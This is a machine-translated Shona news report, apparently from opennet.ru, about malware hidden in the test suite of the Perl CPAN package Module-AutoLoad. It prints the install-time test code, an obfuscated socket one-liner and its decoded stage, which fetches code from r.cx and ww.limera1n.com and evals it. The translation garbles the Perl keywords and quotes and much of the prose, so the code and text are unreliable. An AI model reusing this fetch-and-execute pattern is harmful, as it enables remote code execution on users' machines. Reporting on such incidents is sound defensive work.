Kodhi yakaipa yaonekwa muModule-AutoLoad Perl package

MuPerl package yakagoverwa kuburikidza neCPAN directory Module-AutoLoad, yakagadzirirwa kurongedza otomatiki CPAN modules panhunzi, kuzivikanwa yakaipa code. Kuiswa kwakashata kwaive akawana mu test code 05_rcx.t, iyo yanga ichitumirwa kubva muna 2011.
Izvo zvakakosha kuti mibvunzo nezve kurodha kodhi ine mubvunzo yakasimuka pa stackoverflow kumashure muna 2016.

Chiitiko chakashata chinodzika kusvika pakuedza kudhawunirodha uye kuita kodhi kubva kune yechitatu-bato server (http://r.cx:1/) panguva yekuitwa kweye test suite yakatangwa pakuisa module. Zvinofungidzirwa kuti kodhi yakatanga kutorwa kubva kune yekunze server yanga isiri yakaipa, asi iko zvino chikumbiro chaendeswa kune ww.limera1n.com domain, iyo inopa chikamu chayo chekodhi yekuuraya.

Kuronga kurodha mufaira 05_rcx.t Iyo inotevera kodhi inoshandiswa:

yangu $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Kodhi yakatsanangurwa inoita kuti script iitwe ../contrib/RCX.pl, zviri mukati mazvo zvakaderedzwa kusvika kumutsara:

shandisa lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β€³};

Ichi chinyorwa chinoremerwa kuvhiringika kushandisa sevhisi perlobfuscator.com kodhi kubva kune wekunze r.cx (character codes 82.46.99.88 inoenderana nemavara "R.cX") uye anozviita mu eval block.

$ perl -MIO::Socket -e'$b=nyowani IO::Socket::INET 82.46.99.88.":1β€³; dhinda <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Mushure mekusunungura, zvinotevera zvinozoitwa: code:

dhinda{$b=nyowani IO::Socket::INET"ww.limera1n.com:80β€³}"GET /iJailBreak
";evalor return warn$@while$b;1

Iyo ine dambudziko pasuru ikozvino yabviswa kubva mudura. Kumbomira (Perl Vanyori Upload Server), uye iyo module munyori account yakavharwa. Muchiitiko ichi, module inoramba iripo inowanikwa muMetaCPAN archive uye inogona kuiswa yakananga kubva kuMetaCPAN uchishandisa zvimwe zvekushandisa senge cpanminus. Izvo zvinoonekwakuti pasuru yacho haina kugovaniswa zvakanyanya.

Inonakidza kukurukura zvakabatana uye munyori wemodule, akaramba ruzivo rwekuti kodhi yakaipa yakaiswa mushure mekunge saiti yake "r.cx" yakabiwa uye akatsanangura kuti aingonakidzwa, uye akashandisa perlobfuscator.com kuti asavanza chimwe chinhu, asi kuderedza ukuru. yekodhi uye kurerutsa kukopa kwayo kuburikidza ne clipboard. Sarudzo yezita rebasa rekuti "botstrap" inotsanangurwa nenyaya yekuti izwi iri "rinonzwika senge bot uye ipfupi pane bootstrap." Munyori wemodule akavimbisawo kuti manipulations akaonekwa haaite zvakaipa, asi anongoratidza kurodha nekuita kwekodhi kuburikidza neTCP.

Source: opennet.ru

Voeg